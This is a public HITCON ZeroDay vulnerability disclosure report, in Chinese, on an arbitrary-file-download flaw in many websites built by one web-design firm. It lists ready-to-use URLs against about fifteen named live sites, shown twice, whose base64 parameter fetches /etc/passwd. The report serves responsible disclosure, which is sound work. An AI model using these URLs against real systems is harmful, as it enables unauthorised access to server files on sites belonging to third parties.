Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-01077
- 發信 Vendor: 赤兔數碼有限公司
- Title: 赤兔數碼有限公司底下設計網站 任意檔案下載
- Introduction: 發現該公司底下所設計的多個網站具有任意檔案下載漏洞
處理狀態
目前狀態
公開
Last Update : 2024/11/10
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/09/10 15:30:51 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/09/10 15:33:53 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/09/10 15:51:53 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/09/12 13:58:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/20 18:36:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/20 18:36:04 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/20 18:36:04 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/10 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-01077
- 通報者:nhd1261 ({{萌新}})
- 風險:高
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
赤兔數碼 作品案例
https://www.redgeegee.com/work
德美士貿易
https://www.toyogiken.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
Scion
https://www.scionblockchain.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
寶久實業
https://www.bonjournee.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
銘傳大學建築學系十八屆畢業設計線上展
https://mcu2020.cosmo-demo.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
ARARAT艾爾瑞特藝術所
https://www.ararattw.com/about.php/include/download.php?dl=L2V0Yy9wYXNzd2Q=
趣廚寵物食品用品社
https://www.chychu.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
煌晉法律事務所
https://www.hj-law.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
SEMBLE 艾森浦股份有限公司
https://www.semblecorp.com/download.php?dl=L2V0Yy9wYXNzd2Q=
LeBlanc 初白設計
https://www.leblancness.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
旭日實驗教育機構
https://www.sunriseschool.org/include/download.php?dl=L2V0Yy9wYXNzd2Q=
鈞安牧場
https://www.junanfarm.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
Zealio 智佳電子股份有限公司
https://www.zealio.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
敲歐文化創意有限公司
https://www.jingjhong.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
凱御國際股份有限公司
https://www.kaiyu-int.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
......
此公司製作網站過多難以一一展示
https://www.redgeegee.com/work
德美士貿易
https://www.toyogiken.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
Scion
https://www.scionblockchain.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
寶久實業
https://www.bonjournee.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
銘傳大學建築學系十八屆畢業設計線上展
https://mcu2020.cosmo-demo.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
ARARAT艾爾瑞特藝術所
https://www.ararattw.com/about.php/include/download.php?dl=L2V0Yy9wYXNzd2Q=
趣廚寵物食品用品社
https://www.chychu.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
煌晉法律事務所
https://www.hj-law.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
SEMBLE 艾森浦股份有限公司
https://www.semblecorp.com/download.php?dl=L2V0Yy9wYXNzd2Q=
LeBlanc 初白設計
https://www.leblancness.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
旭日實驗教育機構
https://www.sunriseschool.org/include/download.php?dl=L2V0Yy9wYXNzd2Q=
鈞安牧場
https://www.junanfarm.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
Zealio 智佳電子股份有限公司
https://www.zealio.com.tw/include/download.php?dl=L2V0Yy9wYXNzd2Q=
敲歐文化創意有限公司
https://www.jingjhong.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
凱御國際股份有限公司
https://www.kaiyu-int.com/include/download.php?dl=L2V0Yy9wYXNzd2Q=
......
此公司製作網站過多難以一一展示
敘述
ZD-2024-01074、ZD-2024-01075等多個網站發現相似漏洞,查詢後發現都是同一公司設計,進入赤兔數碼作品案例中用相同方法嘗試,在網址後方添加/include/download.php?dl=L2V0Yy9wYXNzd2Q=,發現就算無對外開放下載檔案的網頁,也可以透過此方法下載passwd。
此公司設計網站眾多,難以一一測試,但我所測試的十幾個網頁都有相同漏洞。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。